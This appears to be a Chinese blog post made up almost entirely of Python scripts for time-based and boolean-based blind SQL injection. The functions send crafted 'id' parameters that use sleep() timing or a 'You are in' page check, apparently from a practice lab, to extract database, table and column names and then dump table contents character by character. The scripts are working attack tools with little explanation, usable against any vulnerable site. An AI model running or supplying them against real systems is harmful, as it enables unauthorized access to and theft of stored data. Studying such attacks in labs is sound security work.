时间盲注
获取库
def inject_database(url):
dataname = ''
for i in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = f"1' and if(ascii(substr(database(),{i},1))>{mid},sleep(2),0)-- "
res = {"id": payload}
start_time = time.time()
try:
r = requests.get(url, params=res, timeout=10)
except requests.exceptions.Timeout:
low = mid + 1
except requests.exceptions.RequestException as e:
print(f"请求失败:{e}")
return None
else:
elapsed_time = time.time() - start_time
if elapsed_time >= 2:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if low == 32:
break
dataname += chr(low)
print("数据库名:", dataname)
return dataname
获取表
def inject_tables(url, database):
tables = []
for i in range(1, 20):
table_name = ''
for j in range(1, 100):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = f"1' and if(ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema='{database}' LIMIT {i-1},1),{j},1))>{mid},sleep(2),0)-- "
res = {"id": payload}
start_time = time.time()
try:
r = requests.get(url, params=res, timeout=10)
except requests.exceptions.Timeout:
low = mid + 1
except requests.exceptions.RequestException as e:
print(f"请求失败:{e}")
return None
else:
elapsed_time = time.time() - start_time
if elapsed_time >= 2:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if low == 32:
break
table_name += chr(low)
if table_name:
tables.append(table_name)
else:
break
print("表名列表:", tables)
return tables
获取列
def inject_columns(url, database, table):
columns = []
for i in range(1, 20):
column_name = ''
for j in range(1, 100):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = f"1' and if(ascii(substr((SELECT column_name FROM information_schema.columns WHERE table_schema='{database}' AND table_name='{table}' LIMIT {i-1},1),{j},1))>{mid},sleep(2),0)-- "
res = {"id": payload}
start_time = time.time()
try:
r = requests.get(url, params=res, timeout=10)
except requests.exceptions.Timeout:
low = mid + 1
except requests.exceptions.RequestException as e:
print(f"请求失败:{e}")
return None
else:
elapsed_time = time.time() - start_time
if elapsed_time >= 2:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if low == 32:
break
column_name += chr(low)
if column_name:
columns.append(column_name)
else:
break
print(f"表 {table} 的列名列表:", columns)
return columns
获取数据
def inject_data(url, database, table, column):
data = []
for i in range(1, 100):
value = ''
for j in range(1, 100):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = f"1' and if(ascii(substr((SELECT {column} FROM {database}.{table} LIMIT {i-1},1),{j},1))>{mid},sleep(2),0)-- "
res = {"id": payload}
start_time = time.time()
try:
r = requests.get(url, params=res, timeout=10)
except requests.exceptions.Timeout:
low = mid + 1
except requests.exceptions.RequestException as e:
print(f"请求失败:{e}")
return None
else:
elapsed_time = time.time() - start_time
if elapsed_time >= 2:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if low == 32:
break
value += chr(low)
if value:
data.append(value)
else:
break
print(f"表 {table} 的列 {column} 数据:", data)
return data
布尔盲注
获取库
def inject_database(url):
dataname = ''
for i in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = f"1' and ascii(substr(database(),{i},1)) > {mid}-- "
res = {"id": payload}
try:
r = requests.get(url, params=res)
except requests.exceptions.RequestException as e:
print(f"请求失败:{e}")
return None
if "You are in" in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if low == 32:
break
dataname += chr(low)
print("数据库名:", dataname)
return dataname
获取表
def inject_tables(url, database):
tables = []
for i in range(1, 20):
table_name = ''
for j in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = f"1' and ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema='{database}' LIMIT {i-1},1),{j},1)) > {mid}-- "
res = {"id": payload}
try:
r = requests.get(url, params=res)
except requests.exceptions.RequestException as e:
print(f"请求失败:{e}")
return None
if "You are in" in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if low == 32:
break
table_name += chr(low)
if table_name:
tables.append(table_name)
else:
break
print("表名列表:", tables)
return tables
获取列
def inject_columns(url, database, table):
columns = []
for i in range(1, 20):
column_name = ''
for j in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = f"1' and ascii(substr((SELECT column_name FROM information_schema.columns WHERE table_schema='{database}' AND table_name='{table}' LIMIT {i-1},1),{j},1)) > {mid}-- "
res = {"id": payload}
try:
r = requests.get(url, params=res)
except requests.exceptions.RequestException as e:
print(f"请求失败:{e}")
return None
if "You are in" in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if low == 32:
break
column_name += chr(low)
if column_name:
columns.append(column_name)
else:
break
print(f"表 {table} 的列名列表:", columns)
return columns
获取数据
def inject_data(url, database, table, column):
data = []
for i in range(1, 20):
value = ''
for j in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = f"1' and ascii(substr((SELECT {column} FROM {database}.{table} LIMIT {i-1},1),{j},1)) > {mid}-- "
res = {"id": payload}
try:
r = requests.get(url, params=res)
except requests.exceptions.RequestException as e:
print(f"请求失败:{e}")
return None
if "You are in" in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if low == 32:
break
value += chr(low)
if value:
data.append(value)
else:
break
print(f"表 {table} 的列 {column} 数据:", data)
return data
扫一扫
1344
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
